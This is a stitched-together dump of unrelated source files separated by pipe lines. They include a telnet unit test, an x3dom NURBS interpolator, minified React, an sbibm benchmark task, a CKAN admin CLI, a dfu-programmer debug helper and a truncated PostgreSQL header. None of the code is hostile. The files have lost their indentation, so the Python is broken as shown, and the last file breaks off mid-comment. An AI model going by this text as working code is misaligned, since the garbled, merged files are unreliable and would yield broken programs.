# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
"""Test functions.
Functions used for unit tests of cli_view.py.
"""
from taucmdr import tests
#from taucmdr.cli import cli_view
class CliViewTest(tests.TestCase):
def test_cli_view(self):
self.assertEqual(1, 1)
|
var unionword =
[
[ "w_float", "unionword.html#af36977dd3e9e1b3d319246b2795ca592", null ],
[ "w_long", "unionword.html#aad3460d83d847510f7cdf66c4cfa5a49", null ],
[ "w_obj", "unionword.html#a1c1b743bf0274774ab01ad52de7fae1b", null ],
[ "w_sym", "unionword.html#a979bae342fac8dbb9af68f15080bedbc", null ]
]; |
/** @namespace x3dom.nodeTypes */
/*
* X3DOM JavaScript Library
* http://www.x3dom.org
*
* (C)2018 A. Plesch, Waltham, MA USA
* Dual licensed under the MIT and GPL
*/
/*
* Ayam, a free 3D modeler for the RenderMan interface.
*
* Ayam is copyrighted 1998-2016 by Randolf Schultz
* ([email protected]) and others.
*
* All rights reserved.
*
* See the file License for details.
*
*/
/* ### NurbsOrientationInterpolator ### */
x3dom.registerNodeType(
"NurbsOrientationInterpolator",
"NURBS",
defineClass(x3dom.nodeTypes.X3DChildNode,
/**
* Constructor for NurbsOrientationInterpolator
* @constructs x3dom.nodeTypes.NurbsOrientationInterpolator
* @x3d 3.3
* @component NURBS
* @status experimental
* @extends x3dom.nodeTypes.X3DChildNode
* @param {Object} [ctx=null] - context object, containing initial settings like namespace
* @classdesc NurbsOrientationInterpolator describes a 3D NURBS curve.
*/
function (ctx) {
x3dom.nodeTypes.NurbsOrientationInterpolator.superClass.call(this, ctx);
/**
* the order of the curve.
* @var {x3dom.fields.SFInt32} order
* @memberof x3dom.nodeTypes.NurbsOrientationInterpolator
* @initvalue 3
* @range [2, inf]
* @field x3d
* @instance
*/
this.addField_SFInt32(ctx, 'order', 3);
/**
* knots defines the knot vector. The number of knots shall be equal to the number of control points
* plus the order of the curve. The order shall be non-decreasing. Within the knot vector there may not be more
* than order−1 consecutive knots of equal value. If the length of a knot vector is 0 or not the exact number
* required (numcontrolPoint + order), a default uniform knot vector is computed.
* @var {x3dom.fields.SFInt32} knot
* @memberof x3dom.nodeTypes.NurbsOrientationInterpolator
* @initvalue []
* @range [-inf, inf]
* @field x3d
* @instance
*/
this.addField_MFDouble(ctx, 'knot', []);
/**
* controlPoint defines the X3DCoordinateNode instance that provides the source of coordinates used to control
* the curve or surface. Depending on the weight value and the order, this piecewise linear curve is approximated
* by the resulting parametric curve. The number of control points shall be equal to or greater than the order.
* @var {x3dom.fields.MFVec2d} controlPoint
* @memberof x3dom.nodeTypes.NurbsOrientationInterpolator
* @initvalue null
* @field x3d
* @instance
*/
this.addField_SFNode('controlPoint', x3dom.nodeTypes.X3DCoordinateNode);
/**
* control point weights: P[i].w = weight[ i ]
* @var {x3dom.fields.MFDouble} weight
* @memberof x3dom.nodeTypes.NurbsOrientationInterpolator
* @initvalue []
* @range [0, inf]
* @field x3d
* @instance
*/
this.addField_MFDouble(ctx, 'weight', []);
/**
* The set_fraction inputOnly field receives an SFFloat event and causes the interpolator node function
* to evaluate, resulting in a value_changed output event of the specified type with the same timestamp as the set_fraction event.
* @var {x3dom.fields.SFFloat} set_fraction
* @memberof x3dom.nodeTypes.NurbsOrientationInterpolator
* @initvalue 0
* @field x3d
* @instance
*/
this.addField_SFFloat(ctx, 'set_fraction', 0);
this.points = []; //MFVec3f controlPoints
this._fractionalShift = 0.01; //relative distance to adjacent point
this._downZ = new x3dom.fields.SFVec3f(0, 0, -1);
//this.basisFunsCache = {}; //N[u]
//this evaluates the curve at set_fraction
//alternatively, tessellate at some degree dependant resolution and turn into linear positioninterpolator
},
{
fieldChanged: function(fieldName) {
// switch (fieldName) {
// case 'knot':
// case 'order': this.basisFunsCache = {};
// }
if(fieldName === "set_fraction")
{
var value = this.getValue(this._vf.set_fraction);
this.postMessage('value_changed', value);
}
},
getValue: function (u) {
this.points = this._cf.controlPoint.node._vf.point;
var points = this.points.length;
var knot = this._vf.knot;
if (knot.length !== points + this._vf.order)
x3dom.nodeTypes.NurbsPositionInterpolator.prototype.createDefaultKnots.call(this);
if (this._vf.weight.length != points)
this._vf.weight = Array(points).fill(1.0);
var uShift = (knot[knot.length-1] - knot[0]) * this._fractionalShift;
var diff = this.curvePoint(u).subtract(this.curvePoint(u+uShift));
return x3dom.fields.Quaternion.rotateFromTo(this._downZ, diff);
},
curvePoint: function (u) {
return x3dom.nodeTypes.NurbsPositionInterpolator.prototype.curvePoint.call(this, u);
},
findSpan: function (n, p, u, U) {
return x3dom.nodeTypes.NurbsCurve.prototype.findSpan(n, p, u, U);
}, /* findSpan */
basisFuns: function (i, u, p, U) { // modified to disable cache
return x3dom.nodeTypes.NurbsPositionInterpolator.prototype.basisFuns(i, u, p, U);
} /* basisFuns */
}
)
);
|
"use strict";
Object.defineProperty(exports, "__esModule", { value: true });
//# sourceMappingURL=classifier.js.map |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_telnet
----------------------------------
Tests for `telnet` module.
"""
try:
import unittest2 as unittest
except ImportError:
import unittest
import telnetlib
from wikipediabase import telnet
# TODO: fix this test, it's hanging because the server is single-threaded
def answer(msg):
return "You said '%s'" % msg
class TestTelnet(unittest.TestCase):
def setUp(self):
self.srv = telnet.TelnetServer(('0.0.0.0', 1984), answer)
self.cli = telnetlib.Telnet("0.0.0.0", 1984)
# def test_answer(self):
# self.srv.serve_forever()
# self.cli.write("Awesome!!\n")
# self.assertIn("You said 'Awesome!!", self.cli.read_some())
def tearDown(self):
self.srv.shutdown()
self.srv.server_close()
if __name__ == '__main__':
unittest.main()
|
/** @license React v16.13.1
* react.production.min.js
*
* Copyright (c) Facebook, Inc. and its affiliates.
*
* This source code is licensed under the MIT license found in the
* LICENSE file in the root directory of this source tree.
*/
'use strict';(function(d,r){"object"===typeof exports&&"undefined"!==typeof module?r(exports):"function"===typeof define&&define.amd?define(["exports"],r):(d=d||self,r(d.React={}))})(this,function(d){function r(a){for(var b="https://reactjs.org/docs/error-decoder.html?invariant="+a,c=1;c<arguments.length;c++)b+="&args[]="+encodeURIComponent(arguments[c]);return"Minified React error #"+a+"; visit "+b+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}
function w(a,b,c){this.props=a;this.context=b;this.refs=ba;this.updater=c||ca}function da(){}function L(a,b,c){this.props=a;this.context=b;this.refs=ba;this.updater=c||ca}function ea(a,b,c){var g,e={},fa=null,d=null;if(null!=b)for(g in void 0!==b.ref&&(d=b.ref),void 0!==b.key&&(fa=""+b.key),b)ha.call(b,g)&&!ia.hasOwnProperty(g)&&(e[g]=b[g]);var h=arguments.length-2;if(1===h)e.children=c;else if(1<h){for(var k=Array(h),f=0;f<h;f++)k[f]=arguments[f+2];e.children=k}if(a&&a.defaultProps)for(g in h=a.defaultProps,
h)void 0===e[g]&&(e[g]=h[g]);return{$$typeof:x,type:a,key:fa,ref:d,props:e,_owner:M.current}}function va(a,b){return{$$typeof:x,type:a.type,key:b,ref:a.ref,props:a.props,_owner:a._owner}}function N(a){return"object"===typeof a&&null!==a&&a.$$typeof===x}function wa(a){var b={"=":"=0",":":"=2"};return"$"+(""+a).replace(/[=:]/g,function(a){return b[a]})}function ja(a,b,c,g){if(C.length){var e=C.pop();e.result=a;e.keyPrefix=b;e.func=c;e.context=g;e.count=0;return e}return{result:a,keyPrefix:b,func:c,
context:g,count:0}}function ka(a){a.result=null;a.keyPrefix=null;a.func=null;a.context=null;a.count=0;10>C.length&&C.push(a)}function O(a,b,c,g){var e=typeof a;if("undefined"===e||"boolean"===e)a=null;var d=!1;if(null===a)d=!0;else switch(e){case "string":case "number":d=!0;break;case "object":switch(a.$$typeof){case x:case xa:d=!0}}if(d)return c(g,a,""===b?"."+P(a,0):b),1;d=0;b=""===b?".":b+":";if(Array.isArray(a))for(var f=0;f<a.length;f++){e=a[f];var h=b+P(e,f);d+=O(e,h,c,g)}else if(null===a||
"object"!==typeof a?h=null:(h=la&&a[la]||a["@@iterator"],h="function"===typeof h?h:null),"function"===typeof h)for(a=h.call(a),f=0;!(e=a.next()).done;)e=e.value,h=b+P(e,f++),d+=O(e,h,c,g);else if("object"===e)throw c=""+a,Error(r(31,"[object Object]"===c?"object with keys {"+Object.keys(a).join(", ")+"}":c,""));return d}function Q(a,b,c){return null==a?0:O(a,"",b,c)}function P(a,b){return"object"===typeof a&&null!==a&&null!=a.key?wa(a.key):b.toString(36)}function ya(a,b,c){a.func.call(a.context,b,
a.count++)}function za(a,b,c){var g=a.result,e=a.keyPrefix;a=a.func.call(a.context,b,a.count++);Array.isArray(a)?R(a,g,c,function(a){return a}):null!=a&&(N(a)&&(a=va(a,e+(!a.key||b&&b.key===a.key?"":(""+a.key).replace(ma,"$&/")+"/")+c)),g.push(a))}function R(a,b,c,g,e){var d="";null!=c&&(d=(""+c).replace(ma,"$&/")+"/");b=ja(b,d,g,e);Q(a,za,b);ka(b)}function t(){var a=na.current;if(null===a)throw Error(r(321));return a}function S(a,b){var c=a.length;a.push(b);a:for(;;){var g=c-1>>>1,e=a[g];if(void 0!==
e&&0<D(e,b))a[g]=b,a[c]=e,c=g;else break a}}function n(a){a=a[0];return void 0===a?null:a}function E(a){var b=a[0];if(void 0!==b){var c=a.pop();if(c!==b){a[0]=c;a:for(var g=0,e=a.length;g<e;){var d=2*(g+1)-1,f=a[d],h=d+1,k=a[h];if(void 0!==f&&0>D(f,c))void 0!==k&&0>D(k,f)?(a[g]=k,a[h]=c,g=h):(a[g]=f,a[d]=c,g=d);else if(void 0!==k&&0>D(k,c))a[g]=k,a[h]=c,g=h;else break a}}return b}return null}function D(a,b){var c=a.sortIndex-b.sortIndex;return 0!==c?c:a.id-b.id}function F(a){for(var b=n(u);null!==
b;){if(null===b.callback)E(u);else if(b.startTime<=a)E(u),b.sortIndex=b.expirationTime,S(p,b);else break;b=n(u)}}function T(a){y=!1;F(a);if(!v)if(null!==n(p))v=!0,z(U);else{var b=n(u);null!==b&&G(T,b.startTime-a)}}function U(a,b){v=!1;y&&(y=!1,V());H=!0;var c=m;try{F(b);for(l=n(p);null!==l&&(!(l.expirationTime>b)||a&&!W());){var g=l.callback;if(null!==g){l.callback=null;m=l.priorityLevel;var e=g(l.expirationTime<=b);b=q();"function"===typeof e?l.callback=e:l===n(p)&&E(p);F(b)}else E(p);l=n(p)}if(null!==
l)var d=!0;else{var f=n(u);null!==f&&G(T,f.startTime-b);d=!1}return d}finally{l=null,m=c,H=!1}}function oa(a){switch(a){case 1:return-1;case 2:return 250;case 5:return 1073741823;case 4:return 1E4;default:return 5E3}}var f="function"===typeof Symbol&&Symbol.for,x=f?Symbol.for("react.element"):60103,xa=f?Symbol.for("react.portal"):60106,Aa=f?Symbol.for("react.fragment"):60107,Ba=f?Symbol.for("react.strict_mode"):60108,Ca=f?Symbol.for("react.profiler"):60114,Da=f?Symbol.for("react.provider"):60109,
Ea=f?Symbol.for("react.context"):60110,Fa=f?Symbol.for("react.forward_ref"):60112,Ga=f?Symbol.for("react.suspense"):60113,Ha=f?Symbol.for("react.memo"):60115,Ia=f?Symbol.for("react.lazy"):60116,la="function"===typeof Symbol&&Symbol.iterator,pa=Object.getOwnPropertySymbols,Ja=Object.prototype.hasOwnProperty,Ka=Object.prototype.propertyIsEnumerable,I=function(){try{if(!Object.assign)return!1;var a=new String("abc");a[5]="de";if("5"===Object.getOwnPropertyNames(a)[0])return!1;var b={};for(a=0;10>a;a++)b["_"+
String.fromCharCode(a)]=a;if("0123456789"!==Object.getOwnPropertyNames(b).map(function(a){return b[a]}).join(""))return!1;var c={};"abcdefghijklmnopqrst".split("").forEach(function(a){c[a]=a});return"abcdefghijklmnopqrst"!==Object.keys(Object.assign({},c)).join("")?!1:!0}catch(g){return!1}}()?Object.assign:function(a,b){if(null===a||void 0===a)throw new TypeError("Object.assign cannot be called with null or undefined");var c=Object(a);for(var g,e=1;e<arguments.length;e++){var d=Object(arguments[e]);
for(var f in d)Ja.call(d,f)&&(c[f]=d[f]);if(pa){g=pa(d);for(var h=0;h<g.length;h++)Ka.call(d,g[h])&&(c[g[h]]=d[g[h]])}}return c},ca={isMounted:function(a){return!1},enqueueForceUpdate:function(a,b,c){},enqueueReplaceState:function(a,b,c,d){},enqueueSetState:function(a,b,c,d){}},ba={};w.prototype.isReactComponent={};w.prototype.setState=function(a,b){if("object"!==typeof a&&"function"!==typeof a&&null!=a)throw Error(r(85));this.updater.enqueueSetState(this,a,b,"setState")};w.prototype.forceUpdate=
function(a){this.updater.enqueueForceUpdate(this,a,"forceUpdate")};da.prototype=w.prototype;f=L.prototype=new da;f.constructor=L;I(f,w.prototype);f.isPureReactComponent=!0;var M={current:null},ha=Object.prototype.hasOwnProperty,ia={key:!0,ref:!0,__self:!0,__source:!0},ma=/\/+/g,C=[],na={current:null},X;if("undefined"===typeof window||"function"!==typeof MessageChannel){var A=null,qa=null,ra=function(){if(null!==A)try{var a=q();A(!0,a);A=null}catch(b){throw setTimeout(ra,0),b;}},La=Date.now();var q=
function(){return Date.now()-La};var z=function(a){null!==A?setTimeout(z,0,a):(A=a,setTimeout(ra,0))};var G=function(a,b){qa=setTimeout(a,b)};var V=function(){clearTimeout(qa)};var W=function(){return!1};f=X=function(){}}else{var Y=window.performance,sa=window.Date,Ma=window.setTimeout,Na=window.clearTimeout;"undefined"!==typeof console&&(f=window.cancelAnimationFrame,"function"!==typeof window.requestAnimationFrame&&console.error("This browser doesn't support requestAnimationFrame. Make sure that you load a polyfill in older browsers. https://fb.me/react-polyfills"),
"function"!==typeof f&&console.error("This browser doesn't support cancelAnimationFrame. Make sure that you load a polyfill in older browsers. https://fb.me/react-polyfills"));if("object"===typeof Y&&"function"===typeof Y.now)q=function(){return Y.now()};else{var Oa=sa.now();q=function(){return sa.now()-Oa}}var J=!1,K=null,Z=-1,ta=5,ua=0;W=function(){return q()>=ua};f=function(){};X=function(a){0>a||125<a?console.error("forceFrameRate takes a positive int between 0 and 125, forcing framerates higher than 125 fps is not unsupported"):
ta=0<a?Math.floor(1E3/a):5};var B=new MessageChannel,aa=B.port2;B.port1.onmessage=function(){if(null!==K){var a=q();ua=a+ta;try{K(!0,a)?aa.postMessage(null):(J=!1,K=null)}catch(b){throw aa.postMessage(null),b;}}else J=!1};z=function(a){K=a;J||(J=!0,aa.postMessage(null))};G=function(a,b){Z=Ma(function(){a(q())},b)};V=function(){Na(Z);Z=-1}}var p=[],u=[],Pa=1,l=null,m=3,H=!1,v=!1,y=!1,Qa=0;B={ReactCurrentDispatcher:na,ReactCurrentOwner:M,IsSomeRendererActing:{current:!1},assign:I};I(B,{Scheduler:{__proto__:null,
unstable_ImmediatePriority:1,unstable_UserBlockingPriority:2,unstable_NormalPriority:3,unstable_IdlePriority:5,unstable_LowPriority:4,unstable_runWithPriority:function(a,b){switch(a){case 1:case 2:case 3:case 4:case 5:break;default:a=3}var c=m;m=a;try{return b()}finally{m=c}},unstable_next:function(a){switch(m){case 1:case 2:case 3:var b=3;break;default:b=m}var c=m;m=b;try{return a()}finally{m=c}},unstable_scheduleCallback:function(a,b,c){var d=q();if("object"===typeof c&&null!==c){var e=c.delay;
e="number"===typeof e&&0<e?d+e:d;c="number"===typeof c.timeout?c.timeout:oa(a)}else c=oa(a),e=d;c=e+c;a={id:Pa++,callback:b,priorityLevel:a,startTime:e,expirationTime:c,sortIndex:-1};e>d?(a.sortIndex=e,S(u,a),null===n(p)&&a===n(u)&&(y?V():y=!0,G(T,e-d))):(a.sortIndex=c,S(p,a),v||H||(v=!0,z(U)));return a},unstable_cancelCallback:function(a){a.callback=null},unstable_wrapCallback:function(a){var b=m;return function(){var c=m;m=b;try{return a.apply(this,arguments)}finally{m=c}}},unstable_getCurrentPriorityLevel:function(){return m},
unstable_shouldYield:function(){var a=q();F(a);var b=n(p);return b!==l&&null!==l&&null!==b&&null!==b.callback&&b.startTime<=a&&b.expirationTime<l.expirationTime||W()},unstable_requestPaint:f,unstable_continueExecution:function(){v||H||(v=!0,z(U))},unstable_pauseExecution:function(){},unstable_getFirstCallbackNode:function(){return n(p)},get unstable_now(){return q},get unstable_forceFrameRate(){return X},unstable_Profiling:null},SchedulerTracing:{__proto__:null,__interactionsRef:null,__subscriberRef:null,
unstable_clear:function(a){return a()},unstable_getCurrent:function(){return null},unstable_getThreadID:function(){return++Qa},unstable_trace:function(a,b,c){return c()},unstable_wrap:function(a){return a},unstable_subscribe:function(a){},unstable_unsubscribe:function(a){}}});d.Children={map:function(a,b,c){if(null==a)return a;var d=[];R(a,d,null,b,c);return d},forEach:function(a,b,c){if(null==a)return a;b=ja(null,null,b,c);Q(a,ya,b);ka(b)},count:function(a){return Q(a,function(){return null},null)},
toArray:function(a){var b=[];R(a,b,null,function(a){return a});return b},only:function(a){if(!N(a))throw Error(r(143));return a}};d.Component=w;d.Fragment=Aa;d.Profiler=Ca;d.PureComponent=L;d.StrictMode=Ba;d.Suspense=Ga;d.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED=B;d.cloneElement=function(a,b,c){if(null===a||void 0===a)throw Error(r(267,a));var d=I({},a.props),e=a.key,f=a.ref,m=a._owner;if(null!=b){void 0!==b.ref&&(f=b.ref,m=M.current);void 0!==b.key&&(e=""+b.key);if(a.type&&a.type.defaultProps)var h=
a.type.defaultProps;for(k in b)ha.call(b,k)&&!ia.hasOwnProperty(k)&&(d[k]=void 0===b[k]&&void 0!==h?h[k]:b[k])}var k=arguments.length-2;if(1===k)d.children=c;else if(1<k){h=Array(k);for(var l=0;l<k;l++)h[l]=arguments[l+2];d.children=h}return{$$typeof:x,type:a.type,key:e,ref:f,props:d,_owner:m}};d.createContext=function(a,b){void 0===b&&(b=null);a={$$typeof:Ea,_calculateChangedBits:b,_currentValue:a,_currentValue2:a,_threadCount:0,Provider:null,Consumer:null};a.Provider={$$typeof:Da,_context:a};return a.Consumer=
a};d.createElement=ea;d.createFactory=function(a){var b=ea.bind(null,a);b.type=a;return b};d.createRef=function(){return{current:null}};d.forwardRef=function(a){return{$$typeof:Fa,render:a}};d.isValidElement=N;d.lazy=function(a){return{$$typeof:Ia,_ctor:a,_status:-1,_result:null}};d.memo=function(a,b){return{$$typeof:Ha,type:a,compare:void 0===b?null:b}};d.useCallback=function(a,b){return t().useCallback(a,b)};d.useContext=function(a,b){return t().useContext(a,b)};d.useDebugValue=function(a,b){};
d.useEffect=function(a,b){return t().useEffect(a,b)};d.useImperativeHandle=function(a,b,c){return t().useImperativeHandle(a,b,c)};d.useLayoutEffect=function(a,b){return t().useLayoutEffect(a,b)};d.useMemo=function(a,b){return t().useMemo(a,b)};d.useReducer=function(a,b,c){return t().useReducer(a,b,c)};d.useRef=function(a){return t().useRef(a)};d.useState=function(a){return t().useState(a)};d.version="16.13.1"});
|
import logging
from pathlib import Path
from typing import Callable, Dict, List, Optional, Tuple
import numpy as np
import pyro
import torch
from pyro import distributions as pdist
from sbibm.tasks.simulator import Simulator
from sbibm.tasks.task import Task
class GaussianLinearUniform(Task):
def __init__(
self, dim: int = 10, prior_bound: float = 1.0, simulator_scale: float = 0.1
):
"""Gaussian Linear Uniform
Inference of mean under uniform prior.
Args:
dim: Dimensionality of parameters and data.
prior_bound: Prior is uniform in [-prior_bound, +prior_bound].
simulator_scale: Standard deviation of noise in simulator.
"""
super().__init__(
dim_parameters=dim,
dim_data=dim,
name=Path(__file__).parent.name,
name_display="Gaussian Linear Uniform",
num_observations=10,
num_posterior_samples=10000,
num_reference_posterior_samples=10000,
num_simulations=[100, 1000, 10000, 100000, 1000000],
path=Path(__file__).parent.absolute(),
)
self.prior_params = {
"low": -prior_bound * torch.ones((self.dim_parameters,)),
"high": +prior_bound * torch.ones((self.dim_parameters,)),
}
self.prior_dist = pdist.Uniform(**self.prior_params).to_event(1)
self.simulator_params = {
"precision_matrix": torch.inverse(
simulator_scale * torch.eye(self.dim_parameters),
)
}
def get_prior(self) -> Callable:
def prior(num_samples=1):
return pyro.sample("parameters", self.prior_dist.expand_by([num_samples]))
return prior
def get_simulator(self, max_calls: Optional[int] = None) -> Simulator:
"""Get function returning samples from simulator given parameters
Args:
max_calls: Maximum number of function calls. Additional calls will
result in SimulationBudgetExceeded exceptions. Defaults to None
for infinite budget
Return:
Simulator callable
"""
def simulator(parameters):
return pyro.sample(
"data",
pdist.MultivariateNormal(
loc=parameters,
precision_matrix=self.simulator_params["precision_matrix"],
),
)
return Simulator(task=self, simulator=simulator, max_calls=max_calls)
def _sample_reference_posterior(
self,
num_samples: int,
num_observation: Optional[int] = None,
observation: Optional[torch.Tensor] = None,
) -> torch.Tensor:
"""Sample reference posterior for given observation
Uses closed form solution with rejection sampling
Args:
num_samples: Number of samples to generate
num_observation: Observation number
observation: Instead of passing an observation number, an observation may be
passed directly
Returns:
Samples from reference posterior
"""
assert not (num_observation is None and observation is None)
assert not (num_observation is not None and observation is not None)
if num_observation is not None:
observation = self.get_observation(num_observation=num_observation)
log = logging.getLogger(__name__)
reference_posterior_samples = []
sampling_dist = pdist.MultivariateNormal(
loc=observation, precision_matrix=self.simulator_params["precision_matrix"],
)
# Reject samples outside of prior bounds
counter = 0
while len(reference_posterior_samples) < num_samples:
counter += 1
sample = sampling_dist.sample()
if not torch.isinf(self.prior_dist.log_prob(sample).sum()):
reference_posterior_samples.append(sample)
reference_posterior_samples = torch.cat(reference_posterior_samples)
acceptance_rate = float(num_samples / counter)
log.info(
f"Acceptance rate for observation {num_observation}: {acceptance_rate}"
)
return reference_posterior_samples
if __name__ == "__main__":
task = GaussianLinearUniform()
task._setup()
|
#!/usr/bin/env python3
import numpy as np
pca = __import__('1-pca').pca
P_init = __import__('2-P_init').P_init
HP = __import__('3-entropy').HP
X = np.loadtxt("mnist2500_X.txt")
X = pca(X, 50)
D, P, betas, _ = P_init(X, 30.0)
H0, P[0, 1:] = HP(D[0, 1:], betas[0])
print(H0)
print(P[0])
|
# -*- coding: utf8 -*-
from __future__ import division
from __future__ import absolute_import
from past.utils import old_div
import six
import ckan.plugins.toolkit as t
import ckan.lib.mailer as mailer
from datetime import datetime
import click
@click.group()
def apicatalog_admin():
'''Creates users based on records uploaded to create_user_to_organization endpoint'''
pass
@apicatalog_admin.command(
u'create-organization-users',
help='Creates users based on records uploaded to create_user_to_organization endpoint'
)
@click.pass_context
@click.option(u'--retry', is_flag=True)
def create_organization_users(ctx, retry):
site_user = t.get_action('get_site_user')({'ignore_auth': True})
flask_app = ctx.meta["flask_app"]
with flask_app.test_request_context():
result = t.get_action('create_organization_users')({'ignore_auth': True, 'user': site_user['name']},
{'retry': retry}).get('result', {})
created = result.get('created', [])
invalid = result.get('invalid', [])
ambiguous = result.get('ambiguous', [])
duplicate = result.get('duplicate', [])
click.echo('Created users: %s' % ', '.join(created))
click.echo('Duplicate users: %s' % ', '.join(duplicate))
click.echo('Unknown business ids: %s' % ', '.join(invalid))
click.echo('Ambiguous business ids: %s' % ', '.join(ambiguous))
@click.group()
def apicatalog_harvest():
'''Harvester related commands.'''
pass
@apicatalog_harvest.command(
u'send-status-emails',
help='Sends harvester status emails to configured recipients'
)
@click.pass_context
@click.option(u'--dryrun', is_flag=True)
@click.option(u'--force', is_flag=True)
@click.option(u'--all-harvesters', is_flag=True)
def send_harvester_status_emails(ctx, dryrun, force, all_harvesters):
email_notification_recipients = t.aslist(t.config.get('ckanext.apicatalog.harvester_status_recipients', ''))
if not email_notification_recipients and not dryrun:
click.echo('No recipients configured')
return
status_opts = {} if not all_harvesters else {'include_manual': True, 'include_never_run': True}
status = t.get_action('harvester_status')({}, status_opts)
errored_runs = any(item.get('errors') != 0 for item in list(status.values()))
running = (item.get('started') for item in list(status.values()) if item.get('status') == 'running')
stuck_runs = any(_elapsed_since(started).days > 1 for started in running)
if not (errored_runs or stuck_runs) and not force:
click.echo('Nothing to report')
return
if len(status) == 0:
click.echo('No harvesters matching criteria found')
return
site_title = t.config.get('ckan.site_title', '')
today = datetime.now().date().isoformat()
status_templates = {
'running': '%%(title)-%ds | Running since %%(time)s with %%(errors)d errors',
'finished': '%%(title)-%ds | Finished %%(time)s with %%(errors)d errors',
'pending': '%%(title)-%ds | Pending since %%(time)s'}
unknown_status_template = '%%(title)-%ds | Unknown status: %%(status)s'
max_title_length = max(len(title) for title in status)
def status_string(title, values):
template = status_templates.get(values.get('status'), unknown_status_template)
status = values.get('status')
time_field = 'finished' if status == 'finished' else 'started'
return template % max_title_length % {
'title': title,
'time': _pretty_time(values.get(time_field)),
'status': status,
'errors': values.get('errors')
}
msg = '%(site_title)s - Harvester summary %(today)s\n\n%(status)s' % {
'site_title': site_title,
'today': today,
'status': '\n'.join(status_string(title, values) for title, values in list(status.items()))
}
subject = '%s - Harvester summary %s' % (site_title, today)
_send_harvester_notification(subject, msg, email_notification_recipients, dryrun)
if dryrun:
click.echo(msg)
@apicatalog_harvest.command(
u'send-stuck-runs-report',
help='Sends stuck runs report to configured recipients'
)
@click.option(u'--dryrun', is_flag=True)
@click.option(u'--force', is_flag=True)
@click.option(u'--all-harvesters', is_flag=True)
@click.pass_context
def send_stuck_runs_report(ctx, dryrun, force, all_harvesters):
email_notification_recipients = t.aslist(t.config.get('ckanext.apicatalog.fault_recipients', ''))
if not email_notification_recipients and not dryrun:
click.echo('No recipients configured')
return
status_opts = {} if not all_harvesters else {'include_manual': True, 'include_never_run': True}
status = t.get_action('harvester_status')({}, status_opts)
stuck_runs = [(title, job_status) for title, job_status in six.iteritems(status)
if job_status.get('status') == 'running' and _elapsed_since(job_status.get('started')).days > 1]
if stuck_runs:
site_title = t.config.get('ckan.site_title', '')
msg = '%(site_title)s - Following harvesters have been running more than 24 hours: \n\n%(status)s\n\n' \
'Instructions to fix this can be found from here %(instructions)s' % \
{
'site_title': site_title,
'status': '\n'.join('%s has been stuck since %s' %
(title, status.get('started')) for title, status in stuck_runs),
'instructions': t.config.get('ckanext.apicatalog.harvester_instruction_url', 'url not configured')
}
subject = '%s - There are stuck harvester runs that need to have a look at' % site_title
_send_harvester_notification(subject, msg, email_notification_recipients, dryrun)
if dryrun:
click.echo(msg)
else:
click.echo('Nothing to report')
def _send_harvester_notification(subject, msg, recipients, dryrun):
for recipient in recipients:
email = {'recipient_name': recipient,
'recipient_email': recipient,
'subject': subject,
'body': msg}
if dryrun:
click.echo('to: %s' % recipient)
else:
try:
mailer.mail_recipient(**email)
except mailer.MailerException as e:
click.echo('Sending harvester notification to %s failed: %s' % (recipient, e))
def _elapsed_since(t):
if t is None:
return t
if isinstance(t, str):
t = datetime.strptime(t, '%Y-%m-%d %H:%M:%S.%f')
return datetime.now() - t
def _pretty_time(t):
if t is None:
return 'unknown'
delta = _elapsed_since(t)
if delta.days == 0:
return 'today'
if delta.days == 1:
return 'yesterday'
elif delta.days < 30:
return '%d days ago' % delta.days
elif delta.days < 365:
return '%d months ago' % int(old_div(delta.days, 30))
else:
return '%d years ago' % int(old_div(delta.days, 365))
@click.group()
def apicatalog_database():
'''Database commands for apicatalog.'''
@apicatalog_database.command()
@click.pass_context
def init(ctx):
'Initializes database for apicatalog'
import ckan.model as model
from .db import init_table
init_table(model.meta.engine)
def get_commands():
return [apicatalog_admin, apicatalog_harvest, apicatalog_database]
|
import google from '../data/google';
import yandex from '../data/yandex';
export default (name, engine) => {
switch (engine) {
case 'google': engine = google; break;
case 'yandex': engine = yandex; break;
default: engine = google;
}
// Validate the name string
if (typeof name !== 'string') {
throw new Error(`The language must be a string, received ${typeof name}`);
}
// Possible overflow errors
if (name.length > 100) {
throw new Error(`The language must be a string under 100 characters, received ${name.length}`);
}
// Let's work with lowercase for everything
name = name.toLowerCase();
return map(name, engine);
function map(name, engine) {
let code = Object.entries(engine).find(kv => kv[0] === name || kv[1] === name);
if (!name || !code) {
throw new Error(`The name "${name}" is not suppored by the ${engine} translation API.`);
}
return code[1];
}
}
|
/*
* dfu-programmer
*
* $Id: atmel.c 25 2006-06-25 00:01:37Z schmidtw $
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
*/
#include <stdarg.h>
#include <stdio.h>
#include "util.h"
extern int debug;
void dfu_debug( const char *file, const char *function, const int line,
const int level, const char *format, ... )
{
if( level < debug ) {
va_list va_arg;
va_start( va_arg, format );
fprintf( stderr, "%s:%d: ", file, line );
vfprintf( stderr, format, va_arg );
va_end( va_arg );
}
}
|
/*-------------------------------------------------------------------------
*
* relcache.h
* Relation descriptor cache definitions.
*
*
* Portions Copyright (c) 1996-2018, PostgreSQL Global Development Group
* Portions Copyright (c) 1994, Regents of the University of California
*
* src/include/utils/relcache.h
*
*-------------------------------------------------------------------------
*/
#ifndef RELCACHE_H
#define RELCACHE_H
#include "access/tupdesc.h"
#include "nodes/bitmapset.h"
/*
